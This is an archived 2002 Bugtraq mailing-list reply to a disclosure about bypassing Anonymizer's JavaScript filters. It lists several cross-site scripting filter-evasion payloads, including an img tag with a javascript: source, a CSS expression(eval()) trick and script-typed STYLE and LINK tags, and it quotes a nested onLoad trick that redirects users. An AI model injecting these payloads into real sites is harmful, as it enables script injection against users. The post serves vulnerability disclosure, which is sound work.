[24941] in bugtraq

home help back first fref pref prev next nref lref last post

Re: Bypassing javascript filters - problem N3.

daemon@ATHENA.MIT.EDU (fozzy@dmpfrance.com)
Wed Apr 3 20:03:50 2002

In-Reply-To: <3327287312.20020401233749@leader.ru>
From: fozzy@dmpfrance.com
To: "Alexander K. Yezhov" <admin@leader.ru>
Cc: bugtraq@securityfocus.com, support@anonymizer.com, feedback@anonymizer.com
Date: Tue, 02 Apr 2002 15:48:23 GMT
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Message-Id: <20020402154823.D668ADB77@mail.fr.clara.net>


Hello,

I took a quick look at it. This service seems to be vulnerable to several
known attacks against webmails.
I successfully injected unfiltered javascript into a web page browsed
through Anonymizer using:

* <img aaa="bbb>" src="javascript:alert('beep');">  
(the original idea was published by Mark Slemko on vuln-dev, 23 Feb 2000...
but is still ignored on many webmails !)

* <P STYLE="left:expression(eval('alert(\'boop\')'))">  (thx to Guninski -
Bugtraq 1999)

* Some things that seems to work only with Netscape 4.x, like :
<STYLE TYPE="text/javascript">alert('biip');</style>
<STYLE TYPE="application/x-javascript">alert('burp');</style>
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="http://.../script.js">
(thx to Jeremiah Grossman - WhiteHatSec Aug 2001)

...and probably more !...

I wish good luck to Anonymizer, because I what they are trying to do is
very close to "malicious html filtering" in webmails, and it seems to be
really difficult for webmails site to setup good filters. I wish Anonymizer
will show the way to a good web privacy.

FozZy

Hackademy - Paris.
Hackerz Voice International Edition
http://www.dmpfrance.com

Alexander K. Yezhov écrit:

> Hello bugtraq,
> 
>   Title: Bypassing JavaScript filters
>   Service: Anonymizer, maybe similar services
> 
>   Description:
> 
>   Anonymizer  offers free and commercial services that allow to browse
>   web safely. Since JavaScript can be dangerous, all script blocks and
>   events are cut from html.
> 
>   Problem N3:
> 
>   Maybe  you  remember  the problem I've reported in 2001 - JavaScript
>   code  could  be  executed  after parsing the html by Anonymizer. The
>   same principle of "JavaScript inside JavaScript" gave me the working
>   example of redirecting Anonymizer users recently.
> 
>   Demo is available as Test N3 at
>   http://anon.free.anonymizer.com/http://tools-on.net/you.shtml
> 
>   The part of the code before parsing:
> 
>   onLoad="onLoad="document.cookie='rw=; expires=Thu, 01-Jan-1970
>   onLoad="location='unprotected_location';"
> 
>   The same code after parsing:
> 
>   onLoad="location='unprotected_location';"
>   
>   Errors  generated  for visitors without Anonymizer are suppressed by
>   window.onError handler.
> 
>   Problem status:
>   
>   Anonymizer has been contacted and patched already.
> 
> Best regards, Alexander                          
> 
> -----------------------------------------------------------------------
>          MCP+I, MCSE on Windows NT 4, MCSE on Windows 2000
>   http://leader.ru http://tools-on.net (Security & Privacy on the Net)
> -----------------------------------------------------------------------
> 

home help back first fref pref prev next nref lref last post